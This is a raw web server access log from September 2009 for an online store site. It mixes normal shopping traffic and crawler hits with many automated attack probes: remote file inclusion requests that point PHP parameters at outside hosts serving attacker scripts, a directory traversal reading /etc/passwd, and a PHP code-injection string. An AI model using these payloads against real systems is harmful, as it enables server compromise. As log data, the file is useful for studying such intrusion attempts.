220.247.11.218 - - [04/Sep/2009:05:08:57 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L117B844C0D17D700353501Y+M37+ENG HTTP/1.1" 200 76085 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L117B84460D37370039D501Y+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [04/Sep/2009:05:09:19 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L117B84430E87E7004C7501Y+M37+ENG HTTP/1.1" 200 40384 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L117B844C0D17D700353501Y+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [04/Sep/2009:05:09:27 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L117B84480C279700599501Y+M37+ENG HTTP/1.1" 200 47223 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [04/Sep/2009:05:09:28 -0400] "GET /images/pf-a.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L117B84480C279700599501Y+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [04/Sep/2009:05:09:28 -0400] "GET /images/space.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L117B84480C279700599501Y+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [04/Sep/2009:05:09:31 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L117B844E09F7B700594501Y+M37+ENG HTTP/1.1" 200 50235 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L117B84480C279700599501Y+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
174.37.136.126 - - [04/Sep/2009:05:09:39 -0400] "GET /logs/access_log.Q109081400//skin/ggambo7002_gallery/setup.php?dir=http://tiete.com.br/copyright.txt???? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
114.108.131.141 - - [04/Sep/2009:05:09:51 -0400] "GET /logs/access_log.Q109072200%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://gant.fileave.com/id1.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
114.108.131.141 - - [04/Sep/2009:05:09:51 -0400] "GET /logs/access_log.Q109072500%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://gant.fileave.com/id1.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
220.247.11.218 - - [04/Sep/2009:05:09:52 -0400] "GET /CGI-BIN/LANSAWEB?PROCFUN+ORINQP+ORDRDT+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L117B824F03F7670066E501X+WSEQ(S0020):2+OKEY(A0190):001388012000O0077493+WEBKEY(A0100):PRTORD HTTP/1.1" 200 39589 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
209.59.12.99 - - [04/Sep/2009:05:09:55 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
87.228.3.118 - - [04/Sep/2009:05:10:09 -0400] "GET //skin/ggambo7002_gallery/setup.php?dir=http://tiete.com.br/copyright.txt???? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
220.247.11.218 - - [04/Sep/2009:05:10:19 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L117B844E09F7B700594501Y+M37+ENG HTTP/1.1" 200 76393 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L117B84480C279700599501Y+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
174.37.136.126 - - [04/Sep/2009:05:11:00 -0400] "GET /logs/access_log.Q109081700%20%20//skin/ggambo7002_gallery/setup.php?dir=http://tiete.com.br/copyright.txt???? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
201.76.47.207 - - [04/Sep/2009:05:11:10 -0400] "GET /index2.php?p=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
174.37.136.126 - - [04/Sep/2009:05:11:19 -0400] "GET /logs/access_log.Q109081400%20%20//skin/ggambo7002_gallery/setup.php?dir=http://tiete.com.br/copyright.txt???? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
87.228.3.118 - - [04/Sep/2009:05:11:46 -0400] "GET /logs/access_log.Q109081400//skin/ggambo7002_gallery/setup.php?dir=http://tiete.com.br/copyright.txt???? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
59.27.95.144 - - [04/Sep/2009:05:12:37 -0400] "GET /logs/access_log.Q109050700//admin/business_inc/saveserver.php?thisdir=http://www.swatoo.net/yes.txt??? HTTP/1.1" 404 259 "-" "libwww-perl/5.79"
59.27.95.144 - - [04/Sep/2009:05:12:37 -0400] "GET //admin/business_inc/saveserver.php?thisdir=http://www.swatoo.net/yes.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.79"
59.27.95.144 - - [04/Sep/2009:05:12:37 -0400] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.swatoo.net/yes.txt??? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
59.27.95.144 - - [04/Sep/2009:05:12:38 -0400] "GET /logs/access_log.Q109051200//admin/business_inc/saveserver.php?thisdir=http://www.swatoo.net/yes.txt??? HTTP/1.1" 404 259 "-" "libwww-perl/5.79"
87.228.3.118 - - [04/Sep/2009:05:13:53 -0400] "GET /logs/access_log.Q109081400%20%20//skin/ggambo7002_gallery/setup.php?dir=http://tiete.com.br/copyright.txt???? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:05:14:48 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:05:14:48 -0400] "GET /logs/access_log.Q109072600///?_SERVER[DOCUMENT_ROOT]=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:05:14:48 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 200 16432 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:05:14:53 -0400] "GET /logs/access_log.Q109050700///?_SERVER[DOCUMENT_ROOT]=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
209.59.12.99 - - [04/Sep/2009:05:14:56 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
91.121.89.135 - - [04/Sep/2009:05:14:58 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:05:14:58 -0400] "GET /logs/access_log.Q109072600%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:05:14:58 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 200 16432 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:05:15:01 -0400] "GET /logs/access_log.Q109050700%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:05:15:04 -0400] "GET //bbs/skin/ggambo7002_board//setup.php?dir=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:05:15:04 -0400] "GET /logs//bbs/skin/ggambo7002_board//setup.php?dir=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:05:15:04 -0400] "GET /logs/access_log.Q109072000//bbs/skin/ggambo7002_board//setup.php?dir=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:05:15:09 -0400] "GET /logs/access_log.Q109080100//bbs/skin/ggambo7002_board//setup.php?dir=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
123.125.66.122 - - [04/Sep/2009:05:17:50 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
91.121.89.135 - - [04/Sep/2009:05:18:10 -0400] "GET /logs/access_log.Q109072000%20%20//bbs/skin/ggambo7002_board//setup.php?dir=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:05:18:12 -0400] "GET /logs/access_log.Q109080100%20%20//bbs/skin/ggambo7002_board//setup.php?dir=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
118.107.163.230 - - [04/Sep/2009:05:18:49 -0400] "GET ///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://jonrothbard.com/one.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
118.107.163.230 - - [04/Sep/2009:05:18:49 -0400] "GET /logs/access_log.Q109062900%20%20///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://jonrothbard.com/one.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
118.107.163.230 - - [04/Sep/2009:05:18:49 -0400] "GET /logs///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://jonrothbard.com/one.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
66.246.252.166 - - [04/Sep/2009:05:18:53 -0400] "GET /logs/access_log.Q109061600//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
66.246.252.166 - - [04/Sep/2009:05:18:53 -0400] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
66.246.252.166 - - [04/Sep/2009:05:18:53 -0400] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
66.246.252.166 - - [04/Sep/2009:05:18:53 -0400] "GET /logs/access_log.Q109071100//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
151.23.90.59 - - [04/Sep/2009:05:19:57 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
151.23.90.59 - - [04/Sep/2009:05:19:57 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
209.59.12.99 - - [04/Sep/2009:05:19:57 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
151.23.90.59 - - [04/Sep/2009:05:19:59 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
151.23.90.59 - - [04/Sep/2009:05:19:59 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
66.246.252.166 - - [04/Sep/2009:05:20:04 -0400] "GET /logs/access_log.Q109061600%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
66.246.252.166 - - [04/Sep/2009:05:20:04 -0400] "GET /logs/access_log.Q109071100%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
78.47.128.166 - - [04/Sep/2009:05:22:12 -0400] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
78.47.128.166 - - [04/Sep/2009:05:22:12 -0400] "GET /logs/access_log.Q109080900//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
78.47.128.166 - - [04/Sep/2009:05:22:12 -0400] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
206.225.95.33 - - [04/Sep/2009:05:22:17 -0400] "GET /logs/access_log.Q109082100//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/albania.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
206.225.95.33 - - [04/Sep/2009:05:22:17 -0400] "GET //index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/albania.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
206.225.95.33 - - [04/Sep/2009:05:22:18 -0400] "GET /logs//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/albania.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
220.181.7.88 - - [04/Sep/2009:05:22:42 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
206.225.95.33 - - [04/Sep/2009:05:23:20 -0400] "GET /logs/access_log.Q109062800//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://shanghaisisa.com/skin/albania.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
121.78.116.209 - - [04/Sep/2009:05:23:55 -0400] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
121.78.116.209 - - [04/Sep/2009:05:23:56 -0400] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
121.78.116.209 - - [04/Sep/2009:05:23:56 -0400] "GET /logs/access_log.Q109061600//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
121.78.116.209 - - [04/Sep/2009:05:24:03 -0400] "GET /logs/access_log.Q109071100//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
78.47.128.166 - - [04/Sep/2009:05:24:48 -0400] "GET /logs/access_log.Q109080900%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
209.59.12.99 - - [04/Sep/2009:05:24:58 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.110.11.75 - - [04/Sep/2009:05:26:00 -0400] "GET /logs/access_log.Q109061600//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
211.110.11.75 - - [04/Sep/2009:05:26:00 -0400] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
211.110.11.75 - - [04/Sep/2009:05:26:00 -0400] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
211.110.11.75 - - [04/Sep/2009:05:26:09 -0400] "GET /logs/access_log.Q109071100//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
221.143.51.115 - - [04/Sep/2009:05:26:57 -0400] "GET /logs/main.php?pagina=http://www.oriman.com/bbs//zfxid1.txt? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
221.143.51.115 - - [04/Sep/2009:05:26:57 -0400] "GET /logs/access_log.Q109072900%20%20/main.php?pagina=http://www.oriman.com/bbs//zfxid1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
221.143.51.115 - - [04/Sep/2009:05:26:57 -0400] "GET /main.php?pagina=http://www.oriman.com/bbs//zfxid1.txt? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
221.143.51.115 - - [04/Sep/2009:05:26:57 -0400] "GET /logs/error_log.Q109072900%20%20/main.php?pagina=http://www.oriman.com/bbs//zfxid1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:05:27:12 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:05:27:13 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 200 16432 "-" "Mozilla/5.0"
174.37.136.126 - - [04/Sep/2009:05:27:14 -0400] "GET /logs//skin/ggambo7002_gallery/setup.php?dir=http://tiete.com.br/copyright.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
174.37.136.126 - - [04/Sep/2009:05:27:14 -0400] "GET //skin/ggambo7002_gallery/setup.php?dir=http://tiete.com.br/copyright.txt???? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
174.37.136.126 - - [04/Sep/2009:05:27:14 -0400] "GET /logs/access_log.Q109051100%20%20//skin/ggambo7002_gallery/setup.php?dir=http://tiete.com.br/copyright.txt???? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
221.143.51.115 - - [04/Sep/2009:05:27:14 -0400] "GET /logs/access_log.Q109082000%20%20/main.php?pagina=http://www.oriman.com/bbs//zfxid1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
91.121.89.135 - - [04/Sep/2009:05:27:31 -0400] "GET /logs/access_log.Q109061700///?_SERVER[DOCUMENT_ROOT]=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
110.45.146.223 - - [04/Sep/2009:05:28:00 -0400] "GET /logs//skin/ggambo7002_board/setup.php?dir=http://www.trotnews.com/board/skin/new/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
110.45.146.223 - - [04/Sep/2009:05:28:00 -0400] "GET //skin/ggambo7002_board/setup.php?dir=http://www.trotnews.com/board/skin/new/id1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
110.45.146.223 - - [04/Sep/2009:05:28:00 -0400] "GET /logs/access_log.Q109081400//skin/ggambo7002_board/setup.php?dir=http://www.trotnews.com/board/skin/new/id1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
110.45.146.223 - - [04/Sep/2009:05:28:02 -0400] "GET /logs//skin/ggambo7002_board/setup.php?dir=http://www.trotnews.com/board/skin/new/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
110.45.146.223 - - [04/Sep/2009:05:28:02 -0400] "GET //skin/ggambo7002_board/setup.php?dir=http://www.trotnews.com/board/skin/new/id1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
110.45.146.223 - - [04/Sep/2009:05:28:02 -0400] "GET /logs/access_log.Q109081400//skin/ggambo7002_board/setup.php?dir=http://www.trotnews.com/board/skin/new/id1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
110.45.146.223 - - [04/Sep/2009:05:28:28 -0400] "GET /logs/access_log.Q109071500//skin/ggambo7002_board/setup.php?dir=http://www.trotnews.com/board/skin/new/id1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
110.45.146.223 - - [04/Sep/2009:05:28:30 -0400] "GET /logs/access_log.Q109071500//skin/ggambo7002_board/setup.php?dir=http://www.trotnews.com/board/skin/new/id1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
110.45.146.223 - - [04/Sep/2009:05:28:35 -0400] "GET //skin/ggambo7002_board/setup.php?dir=http://www.trotnews.com/board/skin/new/id1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
110.45.146.223 - - [04/Sep/2009:05:28:35 -0400] "GET /logs//skin/ggambo7002_board/setup.php?dir=http://www.trotnews.com/board/skin/new/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
110.45.146.223 - - [04/Sep/2009:05:28:35 -0400] "GET /logs/access_log.Q109081400%20%20//skin/ggambo7002_board/setup.php?dir=http://www.trotnews.com/board/skin/new/id1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
110.45.146.223 - - [04/Sep/2009:05:28:36 -0400] "GET //skin/ggambo7002_board/setup.php?dir=http://www.trotnews.com/board/skin/new/id1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
110.45.146.223 - - [04/Sep/2009:05:28:36 -0400] "GET /logs//skin/ggambo7002_board/setup.php?dir=http://www.trotnews.com/board/skin/new/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
110.45.146.223 - - [04/Sep/2009:05:28:36 -0400] "GET /logs/access_log.Q109081400%20%20//skin/ggambo7002_board/setup.php?dir=http://www.trotnews.com/board/skin/new/id1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
110.45.146.223 - - [04/Sep/2009:05:28:42 -0400] "GET /logs/access_log.Q109071500%20%20//skin/ggambo7002_board/setup.php?dir=http://www.trotnews.com/board/skin/new/id1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
110.45.146.223 - - [04/Sep/2009:05:28:43 -0400] "GET /logs/access_log.Q109071500%20%20//skin/ggambo7002_board/setup.php?dir=http://www.trotnews.com/board/skin/new/id1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
151.23.90.59 - - [04/Sep/2009:05:28:52 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
151.23.90.59 - - [04/Sep/2009:05:28:52 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
151.23.90.59 - - [04/Sep/2009:05:28:54 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
151.23.90.59 - - [04/Sep/2009:05:28:54 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
74.6.22.87 - - [04/Sep/2009:05:29:02 -0400] "GET /logs/access_log.Q109050800 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.249.71.201 - - [04/Sep/2009:05:29:09 -0400] "GET /cgi-bin/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L1091FF3226C880008719086+WSEQ(S0060):1+OUITEM(A0200):5099002 HTTP/1.1" 200 27010 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [04/Sep/2009:05:29:58 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
91.121.89.135 - - [04/Sep/2009:05:29:58 -0400] "GET /logs/access_log.Q109061700%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.lazermark.ru/magazin//administrator/components/com_virtuemart/id.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
74.6.22.87 - - [04/Sep/2009:05:30:46 -0400] "GET /logs/access_log.Q109070900 HTTP/1.0" 200 4950912 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
121.78.116.209 - - [04/Sep/2009:05:31:31 -0400] "GET /logs/access_log.Q109061600%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
